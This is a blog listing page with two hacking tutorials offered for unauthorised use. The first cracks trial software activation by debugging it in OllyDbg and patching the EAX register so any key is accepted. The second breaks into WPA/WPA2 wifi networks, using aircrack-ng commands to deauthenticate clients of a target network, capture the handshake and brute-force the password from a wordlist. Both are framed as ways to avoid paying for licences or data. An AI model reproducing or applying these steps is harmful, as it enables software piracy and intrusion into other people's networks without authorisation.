Showing posts with label wifi hacker. Show all posts
Showing posts with label wifi hacker. Show all posts

Monday, 19 December 2016

How to Hack Trial version software to Full version

Are you tired  of  searching Activation keys & Product keys....? Hrere after you dont need to pay for any keys you can use your software for life time with this hack lets begin to our peocess.....

Requirements

  • windows xp & windows 7
  •  IDE & Ollydbg softwares

step 1

Test the program by running the exe of software which we gonna activate and change the date and time of computer to extend the validity of trial pack

step 2

1.Run the ollydbg software 

2.open the exe of software which you want to activate in ollydbg

3.click play button to run the software

4.Right click on CPU windows and Search for-> All Intermodular calls

5.Search for high interest DLLs.GETDLGITEMTEXT or SENDDLGITEM as well
6.Now test it to see which one works to breakout the activation y right clicking the DLL call and set the breakpoint 

7.Then resume the program and enter any activation key and pause the program
8.press f8in cpu window to force the next step until you get TEST EAX.EAX

9.after geting EAX Right click on eax change the hex valuve from 0 to 1

10.Now again resume the program then you will have successfully activatedthe program
Read More

Thursday, 8 December 2016

How to Hack WPA & WPA2 WIFI



Hi Everyone forget about internet data charges..! lets hack encrypted wifi network with simple skills im here to guide you the best way for hacking of wifi network


This method for kali linux users and im gonna make another tutorial for android users ok.lets start our work

open Terminal then follow the given steps ...

step 1-  airmon-ng









 step 2-   airmon-ng start wlan0

 

step 3type airodump-ng followed by the name of the new monitor interface

step 4now it shows wifi signals select the prefered wifi like the image below

 

step 5copy the BSSID of target network


 

step 6-   now the the following command airodump-ng -c (channel) --BSSID (PASTE THAT BBSID) -W/root/Desktop/(monitor interface)     i.e wlan0 or wlan0mon

for eg., airodump-ng -c 10 --bssid 00:14:BF:E0:E8:D5 -w /root/Desktop/ mon0

step 7- now open new terminal then type the following

aireplay-ng -0 4 -a (BSSID) -C  (PWR ID) "wlan0mon" or "wlan0"

  

step 8-   after hitting enter you will see the aireplay sends packet after few minutes in the upper right corner u will get HANDSHAKE





step 9- aircrack-ng -a2 -b (wpa handshake id) -w /root/Desktop/wordlist.txt /root/Desktop/.*cap

 Now press enter then it search for the target wifi password and shows you the exact key

 here the proof..


FOR CREATING WORDLIST VISIT MY YOUTUBE CHANNEL -CLICK HERE 
Read More